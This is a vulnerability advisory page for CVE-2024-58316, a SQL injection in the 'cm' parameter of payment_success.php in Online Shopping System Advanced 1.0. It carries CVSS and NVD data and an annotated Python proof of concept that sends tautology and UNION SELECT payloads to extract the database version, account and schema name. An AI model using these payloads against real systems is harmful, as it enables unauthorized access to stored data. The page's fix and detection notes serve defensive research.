Security Vulnerability Report
CVE-2024-58316 CVSS 7.5 HIGH

CVE-2024-58316

Published: 2025-12-12 21:15:51
Last Modified: 2025-12-19 15:27:57

Description

Online Shopping System Advanced 1.0 contains a SQL injection vulnerability in the payment_success.php script that allows attackers to inject malicious SQL through the unfiltered 'cm' parameter. By manipulating this user ID parameter with crafted SQL, attackers can retrieve sensitive database information.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:puneethreddyhc:online_shopping_system_advanced:1.0:*:*:*:*:*:*:* - VULNERABLE
Online Shopping System Advanced 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
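# CVE-2024-58316 SQL Injection PoC
# Target: Online Shopping System Advanced 1.0
# Vulnerability: payment_success.php 'cm' parameter
#
# Reviewer notes:
# - Weakness class is CWE-89: the 'cm' value reaches a SQL statement
#   unfiltered. The fix belongs in payment_success.php: bind 'cm' through a
#   prepared statement, and validate it as an integer first if the user ID is
#   numeric (the sample value below suggests so; confirm against the schema).
# - Detection: requests to payment_success.php whose 'cm' value contains a
#   quote character or SQL keywords such as UNION/SELECT are the trace these
#   payloads leave in web-server access logs.
import requests
import sys

# Placeholder under the reserved ".example" TLD. The published listing used
# target.com, which is a registered third-party domain, so running it as
# printed would have sent both payloads to that site. Set this to a lab
# instance of the affected application.
target_url = "http://target.example/payment_success.php"

# Substrings treated as database-error indicators in a response body.
# "sql" already covers "mysql"; both are kept to mirror the original check.
_ERROR_MARKERS = ("sql", "mysql", "syntax")


# Basic SQL Injection test - detect vulnerability
def test_sql_injection():
    """Compare a benign request with a quote-bearing one and look for error text.

    Sends ``cm=12345`` and then the page's tautology payload to ``target_url``
    and returns True when an error marker shows up in the second response but
    not in the first.

    The original check looked only at the second response, so any page that
    mentions "sql" or "syntax" in ordinary content was reported as vulnerable;
    the baseline response was fetched and never used.

    A False result is not evidence that the installation is patched: the
    payload is a boolean tautology, which produces no database error when the
    parameter is quoted in the query, and error text is also hidden when PHP
    error display is turned off. Confirm by reading how payment_success.php
    builds its query.

    Returns:
        bool: True if a new error marker appeared, False otherwise or when
        either request failed.
    """
    # Normal request
    normal_params = {"cm": "12345"}
    # Payload from the published listing (the original comment said it
    # "triggers database error"; see the docstring for why that may not hold).
    payload_params = {"cm": "12345' OR '1'='1"}

    try:
        print(f"[*] Testing target: {target_url}")

        # Baseline response
        response1 = requests.get(target_url, params=normal_params, timeout=10)
        print(f"[+] Normal request status: {response1.status_code}")

        # Response to the payload
        response2 = requests.get(target_url, params=payload_params, timeout=10)
        print(f"[+] Malicious request status: {response2.status_code}")
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False

    baseline_text = response1.text.lower()
    payload_text = response2.text.lower()

    # Only markers absent from the baseline count; this removes the false
    # positive on pages whose normal content already contains these words.
    new_markers = [
        marker
        for marker in _ERROR_MARKERS
        if marker in payload_text and marker not in baseline_text
    ]

    if new_markers:
        print("[!] SQL Injection vulnerability confirmed!")
        return True

    print("[-] Vulnerability not detected via error-based method")
    return False


# Extract data using UNION-based injection
def extract_database_info():
    """Send the page's UNION payload and return the raw response body.

    This is the step that corresponds to the confidentiality impact in the
    CVSS vector (C:H): the payload asks the database for its version, the
    connected account and the schema name. The ten-column layout is taken
    from the published listing as-is and has not been verified here.

    Nothing is parsed out of the body; the caller in this listing discards
    the return value.

    Returns:
        str | None: the response text on HTTP 200, otherwise None (non-200
        status or a request failure). The original fell off the end of the
        function on a non-200 status; that path is now explicit.
    """
    # UNION-based payload to extract database version and user
    payload = "12345' UNION SELECT 1,version(),user(),database(),5,6,7,8,9,10-- -"
    params = {"cm": payload}

    try:
        response = requests.get(target_url, params=params, timeout=10)
    except requests.RequestException as e:
        print(f"[-] Extraction failed: {e}")
        return None

    if response.status_code != 200:
        print(f"[-] Unexpected status: {response.status_code}")
        return None

    print("[+] Database info extraction response received")
    return response.text


if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2024-58316 SQL Injection Exploitation")
    print("=" * 60)

    if test_sql_injection():
        print("\n[*] Attempting data extraction...")
        extract_database_info()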

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-58316", "sourceIdentifier": "[email protected]", "published": "2025-12-12T21:15:51.430", "lastModified": "2025-12-19T15:27:57.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Online Shopping System Advanced 1.0 contains a SQL injection vulnerability in the payment_success.php script that allows attackers to inject malicious SQL through the unfiltered 'cm' parameter. Attackers can exploit the vulnerability by sending crafted SQL queries to retrieve sensitive database information by manipulating the user ID parameter."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:puneethreddyhc:online_shopping_system_advanced:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "0BD433B1-A992-47F6-9EF6-192200716D71"}]}]}], "references": [{"url": "https://github.com/PuneethReddyHC/online-shopping-system-advanced", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/51811", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/online-shopping-system-advanced-sql-injection-via-payment-success-parameter", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}